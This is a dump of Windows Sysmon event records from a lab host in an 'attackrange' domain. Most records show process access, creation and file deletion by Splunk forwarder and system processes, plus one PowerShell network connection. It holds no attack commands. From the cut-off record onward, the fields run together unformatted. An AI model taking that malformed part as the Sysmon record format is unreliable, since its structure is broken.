  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083319, UtcTime 2021-09-09 18:04:43.859
  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083318, UtcTime 2021-09-09 18:04:43.859
  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083317, UtcTime 2021-09-09 18:04:43.859
  Source {B81B27B7-4012-611D-0500-00000000C801}  SourceProcessId 420  SourceThreadId 436  SourceImage C:\Windows\system32\csrss.exe
  Target {B81B27B7-4CBB-613A-0C90-03000000C801}  TargetProcessId 7004  TargetImage C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
  GrantedAccess 0x1fffff
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

Event ID 10 (ProcessAccess), RecordID 35083316, UtcTime 2021-09-09 18:04:43.859
  Source {B81B27B7-4013-611D-2700-00000000C801}  SourceProcessId 2076  SourceThreadId 3760  SourceImage C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
  Target {B81B27B7-4CBB-613A-0C90-03000000C801}  TargetProcessId 7004  TargetImage C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
  GrantedAccess 0x1fffff
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 1 (ProcessCreate), RecordID 35083315, UtcTime 2021-09-09 18:04:43.844
  ProcessGuid {B81B27B7-4CBB-613A-0C90-03000000C801}  ProcessId 7004  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
  FileVersion 8.0.2  Description Registry monitor  Product splunk Application  Company Splunk Inc.  OriginalFileName splunk-regmon.exe
  CommandLine "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
  CurrentDirectory C:\Windows\system32\  User NT AUTHORITY\SYSTEM  LogonGuid {B81B27B7-4012-611D-E703-000000000000}  LogonId 0x3e7  TerminalSessionId 0  IntegrityLevel System
  Hashes MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25
  ParentProcessGuid {B81B27B7-4013-611D-2700-00000000C801}  ParentProcessId 2076  ParentImage C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe  ParentCommandLine "C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service

Event ID 23 (FileDelete), RecordID 35083314, UtcTime 2021-09-09 18:04:43.592
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=DCC62BB7016309E631D9A8C1ECE106AC,SHA256=5E0A8A4FEDCB4DABE717F18A984D3B08DC74AA0BCB6812D3431FE1F28C6186B0,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083337, UtcTime 2021-09-09 18:04:44.894
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security
  Hashes MD5=400ADB5DDB80DF69DAC0E0776FAB82DC,SHA256=094D218D1860DEE91847E36969C1778569AAB134B63A51978CC5563B847B7AFB,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083336, UtcTime 2021-09-09 18:04:44.893
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security
  Hashes MD5=95A9DB9E63211794FF7273B8B834890A,SHA256=348694B5FBE218062F6F1EDA30DE85E1BB012EDEA3D2EA6BF71868605E54F4FB,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 10 (ProcessAccess), RecordID 35083335, UtcTime 2021-09-09 18:04:44.696
  Source {B81B27B7-4CBC-613A-0D90-03000000C801}  SourceProcessId 4716  SourceThreadId 6956  SourceImage C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
  Target {B81B27B7-4013-611D-2700-00000000C801}  TargetProcessId 2076  TargetImage C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
  GrantedAccess 0x101400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 23 (FileDelete), RecordID 35083334, UtcTime 2021-09-09 18:04:44.612
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=FA4AD335279D54C505F9F957CC8B39BB,SHA256=3474A0C5A03E6AE12ADFAD9B6FB6F4C150A64EC9ED2548DACEF58808D1F69B35,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 10 (ProcessAccess), RecordID 35083333, UtcTime 2021-09-09 18:04:44.543
  Source {B81B27B7-4014-611D-3000-00000000C801}  SourceProcessId 3144  SourceThreadId 3164  SourceImage C:\Windows\system32\conhost.exe
  Target {B81B27B7-4CBC-613A-0D90-03000000C801}  TargetProcessId 4716  TargetImage C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
  GrantedAccess 0x1fffff
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083332, UtcTime 2021-09-09 18:04:44.543
  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083331, UtcTime 2021-09-09 18:04:44.543
  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083330, UtcTime 2021-09-09 18:04:44.543
  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083329, UtcTime 2021-09-09 18:04:44.543
  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083328, UtcTime 2021-09-09 18:04:44.543
  Source {B81B27B7-4012-611D-0500-00000000C801}  SourceProcessId 420  SourceThreadId 436  SourceImage C:\Windows\system32\csrss.exe
  Target {B81B27B7-4CBC-613A-0D90-03000000C801}  TargetProcessId 4716  TargetImage C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
  GrantedAccess 0x1fffff
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

Event ID 10 (ProcessAccess), RecordID 35083327, UtcTime 2021-09-09 18:04:44.543
  Source {B81B27B7-4013-611D-2700-00000000C801}  SourceProcessId 2076  SourceThreadId 3760  SourceImage C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
  Target {B81B27B7-4CBC-613A-0D90-03000000C801}  TargetProcessId 4716  TargetImage C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
  GrantedAccess 0x1fffff
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 1 (ProcessCreate), RecordID 35083326, UtcTime 2021-09-09 18:04:44.528
  ProcessGuid {B81B27B7-4CBC-613A-0D90-03000000C801}  ProcessId 4716  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
  FileVersion -  Description -  Product -  Company -  OriginalFileName -
  CommandLine "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
  CurrentDirectory C:\Windows\system32\  User NT AUTHORITY\SYSTEM  LogonGuid {B81B27B7-4012-611D-E703-000000000000}  LogonId 0x3e7  TerminalSessionId 0  IntegrityLevel System
  Hashes MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C
  ParentProcessGuid {B81B27B7-4013-611D-2700-00000000C801}  ParentProcessId 2076  ParentImage C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe  ParentCommandLine "C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service

Event ID 3 (NetworkConnect), RecordID 35083325, UtcTime 2021-09-09 18:05:09.024
  ProcessGuid {B81B27B7-4822-613A-788F-03000000C801}  ProcessId 6940  User ATTACKRANGE\REED_SCHMIDT
  Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Protocol tcp  Initiated true  SourceIsIpv6 false  SourceIp 10.0.1.15  SourceHostname win-host-987.attackrange.local  SourcePort 56462  SourcePortName -
  DestinationIsIpv6 false  DestinationIp 10.0.1.16  DestinationHostname ip-10-0-1-16.us-west-2.compute.internal  DestinationPort 443  DestinationPortName https

Event ID 10 (ProcessAccess), RecordID 35083324, UtcTime 2021-09-09 18:04:44.043
  Source {B81B27B7-4CBB-613A-0C90-03000000C801}  SourceProcessId 7004  SourceThreadId 908  SourceImage C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
  Target {B81B27B7-4013-611D-2700-00000000C801}  TargetProcessId 2076  TargetImage C:\Program (record cut off here in the source; GrantedAccess and CallTrace are missing)
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035083323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.043{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5EB6957777E31DCD2FDA9067A5E4F2F9,SHA256=B84ED568312EC68036983431FC7BC7D3843E04486B8BEAA14D3EC3207377BF2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.643{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A58CBCBD041FB6B0C081395F9306686B,SHA256=9D6455C26BBE2258B8695223878C2C46C81ADBD1F2A80FAAF5E6251DDFE37F52,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CBD-613A-0E90-03000000C801}2788C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:04:45.159{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:04:45.159{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4CBD-613A-0E90-03000000C801}2788C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CBD-613A-0E90-03000000C801}2788C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
